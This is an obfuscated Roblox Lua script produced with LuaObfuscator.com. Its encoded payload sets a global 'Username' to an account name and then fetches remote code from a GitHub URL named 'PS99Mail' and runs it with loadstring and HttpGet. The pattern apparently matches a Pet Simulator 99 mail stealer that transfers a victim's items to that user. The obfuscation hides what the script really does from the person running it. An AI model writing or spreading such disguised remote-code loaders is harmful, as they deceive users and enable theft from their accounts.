--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=0;local v89;while true do if (v88==1) then return v89;end if (v88==0) then v89=v5(v82,v19);v19=nil;v88=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-1) -(v32-1)) + (2 -1))) ;return v83-(v83%(620 -((1432 -(282 + 595)) + 64))) ;else local v84=((2570 -(1523 + 114)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 641 + 72))) or ((0 -0) + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1065 -(68 + 997) ;local v36;local v37;while true do if (v35==(1271 -(226 + 1044))) then return (v37 * (1114 -858)) + v36 ;end if (v35==(117 -((989 -(892 + 65)) + 85))) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;v35=1 + 0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + ((868 -514) -(87 + 263)) ;return (v41 * (16777396 -(67 + 113))) + (v40 * 65536) + (v39 * (472 -216)) + v38 ;end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(11 -8)) then if (v47==(952 -(802 + 150))) then if (v46==(0 -0)) then return v48 * ((766 -(745 + 21)) -0) ;else v47=431 -(16 + 28 + 386) ;v45=0 -0 ;end elseif (v47==((4099 -2609) + (2184 -1627))) then return ((v46==(0 + 0)) and (v48 * ((773 -(201 + 571))/(997 -(915 + 82))))) or (v48 * NaN) ;end return v8(v48,v47-(2896 -1873) ) * (v45 + (v46/((1 + 1 + 0)^((54 + 14) -16)))) ;end if (v42==(1189 -(1069 + (1173 -(87 + 968))))) then v47=v20(v44,74 -53 ,890 -(814 + 45) );v48=((v20(v44,(343 -265) -46 )==(2 -(1 + 0))) and  -(1 -0)) or (1 + 0) ;v42=4 -1 ;end if (v42==(1081 -(1020 + 60))) then v45=1 -0 ;v46=(v20(v44,3 -2 ,20 + 0 ) * (2^(823 -(368 + 423)))) + v43 ;v42=6 -4 ;end if (v42==(18 -(10 + 8))) then v43=v23();v44=v23();v42=3 -2 ;end end end local function v25(v49)local v50=0 -0 ;local v51;local v52;while true do if (v50==(1415 -((984 -537) + 966))) then v52={};for v90=1, #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=8 -5 ;end if ((1818 -(1703 + 114))==v50) then v51=v3(v16,v18,(v18 + v49) -(702 -(376 + 325)) );v18=v18 + v49 ;v50=2 -(14 -(9 + 5)) ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=377 -(85 + 291) ;end if (v50==(1 + 2)) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(1 + 0)) then v56=nil;v57=nil;v53=2;end if ((0 -0)~=v53) then else v54=0 -0 ;v55=nil;v53=1770 -(1749 + 20) ;end if (v53~=(1 + 2)) then else v60=nil;v61=nil;v53=4;end if (v53==(1324 -(1249 + 73))) then v58=nil;v59=nil;v53=1616 -(1565 + 48) ;end if ((2 + 2)~=v53) then else while true do if (v54==(1148 -(466 + 679))) then v61=nil;while true do local v100=267 -(176 + 91) ;local v101;while true do if (v100==(0 -0)) then v101=0 -0 ;while true do if (v101==0) then if (v55~=2) then else local v152=0 -0 ;while true do if (v152==(1900 -(106 + 1794))) then for v159=1 + 0 ,v23() do local v160=0 + 0 ;local v161;local v162;local v163;while true do if (v160~=0) then else v161=0 + 0 ;v162=nil;v160=2 -1 ;end if (v160==(2 -1)) then v163=nil;while true do if (0==v161) then local v168=0;while true do if (v168==(115 -(4 + 110))) then v161=585 -(57 + 527) ;break;end if ((1427 -(41 + 1386))==v168) then v162=103 -(17 + 86) ;v163=nil;v168=1 + 0 ;end end end if ((1 -0)==v161) then while true do if (v162==0) then v163=v21();if (v20(v163,3 -2 ,1)~=(0 -0)) then else local v177=1018 -(697 + 321) ;local v178;local v179;local v180;local v181;while true do if (v177==(5 -3)) then while true do if (v178==1) then local v183=166 -(122 + 44) ;local v184;while true do if (v183~=(0 -0)) then else v184=0 -0 ;while true do if (v184~=(0 -0)) then else v181={v22(),v22(),nil,nil};if (v179==(65 -(30 + 35))) then local v198=0 -0 ;while true do if (v198~=(1227 -(322 + 905))) then else v181[3]=v22();v181[615 -(602 + 9) ]=v22();break;end end elseif (v179==(1190 -(449 + 740))) then v181[3 + 0 ]=v23();elseif (v179==(1259 -(1043 + 214))) then v181[3]=v23() -((7 -5)^(888 -(826 + 46))) ;elseif (v179~=(950 -(245 + 702))) then else local v208=1212 -(323 + 889) ;while true do if (v208~=0) then else v181[7 -4 ]=v23() -((582 -(361 + 219))^(336 -(53 + 267))) ;v181[4]=v22();break;end end end v184=1;end if (v184==(1 + 0)) then v178=415 -(15 + 398) ;break;end end break;end end end if (v178==(442 -(382 + 58))) then local v185=0;while true do if (v185~=(983 -(18 + 964))) then else v178=9 -6 ;break;end if (v185==0) then local v194=0 -0 ;while true do if (v194==(0 + 0)) then if (v20(v180,1 -0 ,2 -1 )~=1) then else v181[2 + 0 ]=v61[v181[2]];end if (v20(v180,3 -1 ,2 + 0 )~=(851 -(20 + 830))) then else v181[3]=v61[v181[1 + 2 ]];end v194=1 + 0 ;end if (v194==1) then v185=127 -(116 + 10) ;break;end end end end end if (v178==3) then if (v20(v180,3,1 + 2 )==1) then v181[742 -(542 + 196) ]=v61[v181[4]];end v56[v159]=v181;break;end if (v178~=(0 -0)) then else local v187=0 + 0 ;local v188;while true do if (v187~=(0 + 0)) then else v188=1463 -(1404 + 59) ;while true do if (v188~=(2 -1)) then else v178=1 + 0 ;break;end if (v188==(0 -0)) then local v195=0 -0 ;local v196;while true do if (v195==(0 -0)) then v196=562 -(334 + 228) ;while true do if (v196==(0 -0)) then local v207=0;while true do if (v207==(1552 -(1126 + 425))) then v196=1;break;end if (0==v207) then v179=v20(v163,2,5 -2 );v180=v20(v163,2 + 2 ,242 -(141 + 95) );v207=406 -(118 + 287) ;end end end if (v196~=(3 -2)) then else v188=2 -1 ;break;end end break;end end end end break;end end end end break;end if ((1121 -(118 + 1003))==v177) then local v182=0 -0 ;while true do if (v182==(1 + 0)) then v177=2 -1 ;break;end if (v182==(0 -0)) then v178=0;v179=nil;v182=378 -(142 + 235) ;end end end if (v177==(4 -3)) then v180=nil;v181=nil;v177=1 + 1 ;end end end break;end end break;end end break;end end end for v164=1,v23() do v57[v164-(1 + 0) ]=v28();end v152=1 -0 ;end if (v152==1) then return v59;end end end if (v55==1) then local v153=977 -(553 + 424) ;local v154;local v155;while true do if (v153==0) then v154=0 -0 ;v155=nil;v153=1 + 0 ;end if (v153==1) then while true do if (v154==(0 + 0)) then v155=0 + 0 ;while true do if ((0 + 0)==v155) then v60=v23();v61={};v155=1 + 0 ;end if ((1 + 0)==v155) then local v166=0 -0 ;while true do if (v166==(0 -0)) then for v171=1,v60 do local v172=0 -0 ;local v173;local v174;local v175;local v176;while true do if (v172==(2 + 0)) then while true do if (v173~=(1 + 0)) then else v176=nil;while true do if (v174==(0 -0)) then local v189=0;local v190;while true do if (v189==(753 -(239 + 514))) then v190=0 + 0 ;while true do if (v190==1) then v174=1330 -(797 + 532) ;break;end if (v190==(1790 -(573 + 1217))) then local v197=0 -0 ;while true do if (v197~=0) then else v175=v21();v176=nil;v197=1;end if (v197==(1 + 0)) then v190=1 + 0 ;break;end end end end break;end end end if (v174==(1 -0)) then if (v175==(940 -(714 + 225))) then v176=v21()~=(0 -0) ;elseif (v175==2) then v176=v24();elseif (v175==(3 -0)) then v176=v25();end v61[v171]=v176;break;end end break;end if (v173~=(0 + 0)) then else v174=1202 -(373 + 829) ;v175=nil;v173=732 -(476 + 255) ;end end break;end if (v172==(1130 -(369 + 761))) then v173=48 -(25 + 23) ;v174=nil;v172=1;end if ((1 + 0)==v172) then v175=nil;v176=nil;v172=2;end end end v59[5 -2 ]=v21();v166=1 -0 ;end if (v166~=(239 -(64 + 174))) then else v155=1 + 1 ;break;end end end if (v155~=(2 -0)) then else v55=2;break;end end break;end end break;end end end v101=733 -(16 + 716) ;end if (1~=v101) then else if (v55==0) then local v156=336 -(144 + 192) ;local v157;local v158;while true do if (v156==(0 -0)) then v157=216 -(42 + 174) ;v158=nil;v156=1;end if (v156==1) then while true do if (v157==(97 -(11 + 86))) then v158=0 + 0 ;while true do if (v158==(286 -(175 + 110))) then local v167=0;while true do if (v167~=0) then else local v170=0 + 0 ;while true do if (v170==(0 -0)) then v58={};v59={v56,v57,nil,v58};v170=1505 -(363 + 1141) ;end if (v170==(1581 -(1183 + 397))) then v167=2 -1 ;break;end end end if (v167~=(1 + 0)) then else v158=2 + 0 ;break;end end end if (v158==(1977 -(1913 + 62))) then v55=1;break;end if (v158~=(0 -0)) then else v56={};v57={};v158=1 + 0 ;end end break;end end break;end end end break;end end break;end end end break;end if (v54~=(5 -3)) then else local v96=1933 -(565 + 1368) ;while true do if (v96~=0) then else v59=nil;v60=nil;v96=3 -2 ;end if (v96==(1662 -(1477 + 184))) then v54=3;break;end end end if (v54==(1 -0)) then local v97=0 + 0 ;while true do if (v97~=(1 + 0)) then else v54=858 -(564 + 292) ;break;end if (v97==(733 -(711 + 22))) then local v124=0;while true do if (v124==0) then v57=nil;v58=nil;v124=1 -0 ;end if (v124~=(860 -(240 + 619))) then else v97=1 + 0 ;break;end end end end end if (v54==(0 -0)) then local v98=0 -0 ;local v99;while true do if (v98==(0 + 0)) then v99=0;while true do if (v99==(305 -(244 + 60))) then v54=1 + 0 ;break;end if ((1744 -(1344 + 400))==v99) then local v146=476 -(41 + 435) ;while true do if (v146==(1002 -(938 + 63))) then v99=1 + 0 ;break;end if (v146~=0) then else v55=0 + 0 ;v56=nil;v146=4 -3 ;end end end end break;end end end end break;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=4) then if (v81<=1) then if (v81>0) then v72=v80[3];else local v103=v80[2];local v104=v78[v80[3]];v78[v103 + 1 ]=v104;v78[v103]=v104[v80[4]];end elseif (v81<=2) then local v108;local v109,v110;local v111;local v112;v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v112=v80[2];v111=v78[v80[3]];v78[v112 + 1 ]=v111;v78[v112]=v111[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v112=v80[2];v109,v110=v71(v78[v112](v13(v78,v112 + 1 ,v80[3])));v73=(v110 + v112) -1 ;v108=0;for v125=v112,v73 do v108=v108 + 1 ;v78[v125]=v109[v108];end v72=v72 + 1 ;v80=v68[v72];v112=v80[2];v78[v112]=v78[v112](v13(v78,v112 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81>3) then do return;end else v78[v80[2]]();end elseif (v81<=7) then if (v81<=5) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==6) then v64[v80[3]]=v78[v80[2]];else local v137=v80[2];local v138,v139=v71(v78[v137](v13(v78,v137 + 1 ,v80[3])));v73=(v139 + v137) -1 ;local v140=0;for v143=v137,v73 do v140=v140 + 1 ;v78[v143]=v138[v140];end end elseif (v81<=8) then v78[v80[2]]=v80[3];elseif (v81==9) then local v141=0;local v142;while true do if (v141==0) then v142=v80[2];v78[v142]=v78[v142](v13(v78,v142 + 1 ,v73));break;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030C3O00656C702O61736D6173746572030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012083O00013O0026053O0001000100010004013O00010001001208000100033O001202000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E00010004013O000100012O00043O00017O00",v9(),...);
